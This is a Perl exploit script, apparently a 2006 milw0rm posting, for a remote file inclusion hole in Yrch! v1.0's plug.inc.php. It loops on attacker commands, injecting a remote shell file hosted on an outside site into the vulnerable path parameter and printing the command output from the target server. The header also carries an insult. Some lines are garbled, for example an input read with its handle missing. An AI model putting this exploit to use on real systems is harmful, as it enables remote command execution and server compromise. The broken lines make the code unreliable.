#!/usr/bin/perl ########################################################################################################## # # # Yrch! v1.0 Hierarchised Website Directories (plug.inc.php)Remote File Include Vulnerability # # # # Bug Found : DeltahackingTEAM discovery:Dr.Pantagon & Exploitet By Dr.Trojan contact Dr.Trojan[a]DeltaSecurity.ir # # # # Class: Remote File Include Vulnerability # # # # exemplary Exp: http://lashiyane.org/[path]/yrch/plugins/metasearch/plug.inc.php?path=[ # # # # Remote: Yes # # # # Type: Highly critical # # # # Vulnerable Code:include_once($path."metasearch.class.php"); # # # # Download:http://switch.dl.sourceforge.net/sourceforge/yrch/Yrch.v1.0.zip # # # # Ptach : www.Advistory.deltasecurity.ir # # # # Bug Found : DeltahackingTEAM Exploitet Discovered &Exploitet: Dr.Trojan # # # #SP FUCK.............: z_zer0c00l(floozie Mother Test 100%=z_zer0c00l=misbegotten:D) # ########################################################################################################## use LWP::UserAgent; use LWP::Simple; $target = @ARGV[0]; $shellsite = @ARGV[1]; $shellcmd = @ARGV[2]; $file = "plug.inc.php?path="; if(!$target || !$shellsite) { usage(); } header(); print "Type 'exit' to quit"; print "[cmd]\$"; $cmd = ; while ($cmd !~ "exit") { $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect."); $res = $xpl->request($req); $r = $res->content; $r =~ tr/[\n]/[ê]/; if (@ARGV[4] eq "-r") { print $r; } elsif (@ARGV[5] eq "-p") { # if not working change cmd variable to null and apply patch manually. $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> list_last.inc"; print q { } } else { print "[cmd]\$"; $cmd = ; } } sub header() { print q { ################################################################################# Bug Found : DeltahackingTEAM Yrch!.pl - Remote File Include Exploit Vulnerability discovered and exploitet by Dr.Trojan&Dr.Pantagon Dr.Trojan@Deltasecurity.ir www.DeltaSecurity.ir & www.Takserver.ir ################################################################################# }; } sub usage() { header(); print q { ######################################################################## Usage: perl Yrch!.pl <-r> <-p> - Path to target eg: www.lashiyane.org/yrch/plugins/metasearch - Path to shell eg: d4wood.by.ru/cmd.gif - Shell command variable name eg: Pwd - Show output from shell

- plug.inc.php Example: perl Yrch!.pl http://localhost/include http://localhost/s.txt cmd -r -p ######################################################################## }; exit(); } # Farzad.SHarifi # milw0rm.com [2006-12-27]